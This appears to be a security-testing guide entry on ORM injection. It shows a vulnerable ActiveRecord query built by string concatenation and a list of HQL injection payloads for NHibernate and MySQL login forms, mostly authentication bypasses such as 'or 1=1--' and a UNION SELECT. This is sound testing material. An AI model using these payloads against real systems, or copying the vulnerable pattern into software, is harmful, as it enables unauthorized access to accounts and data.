ORM injection testing is similar to SQL Injection Testing. In this case, testers use a SQL Injection against an ORM-generated data access object model. From the tester’s point of view, this attack is virtually identical to a SQL Injection attack. However, the injection vulnerability exists in the code generated by an ORM tool.
ORM tools include Hibernate for Java, NHibernate for .NET, ActiveRecord for Ruby on Rails, EZPDO for PHP and many others. List of ORM tools
Example
Patterns to look for in code include:
Input parameters concatenated with SQL strings. This code that uses ActiveRecord for Ruby on Rails is vulnerable (though any ORM can be vulnerable)
Orders.find_all "customer_id = 123 AND order_date = '#{@params['order_date']}'"
Simply sending "' OR 1--" in the form where order date can be entered can yield positive results.
HQLi Examples – NHibernate framework installed on .NET
- NHibernate escapes char ‘ with “. Chars ” are considered ‘ escaped char by HQL and an ” in MySQL.
- MySQL escapes char ‘ with \’ . Chars \’ are considered \’ by HQL (\ is normal for HQL ), but ‘ (escaped quote) by MySQL.
admin"-- in username and password is blank
admin"# in username and password is blank
user1 in username " or 1=1-- in password
user2" # in username and password is blank
user2" /* in username and password is blank
or 1=1-- in username and password is blank
or 1=1# in username and password is blank
"OR\"=" in both username and password
UNION SELECT * FROM logintable -- in username and abcd in password
'user1\" or 1=(select 1)--' in username and password is blank
" or true-- in username and password is blank
'" or ""='" in username and password is blank
'') or true-- in username and password is blank (to review)
"') or 1-- in username and password is blank
'')) or (("'))=(('' in username and password is blank (to review)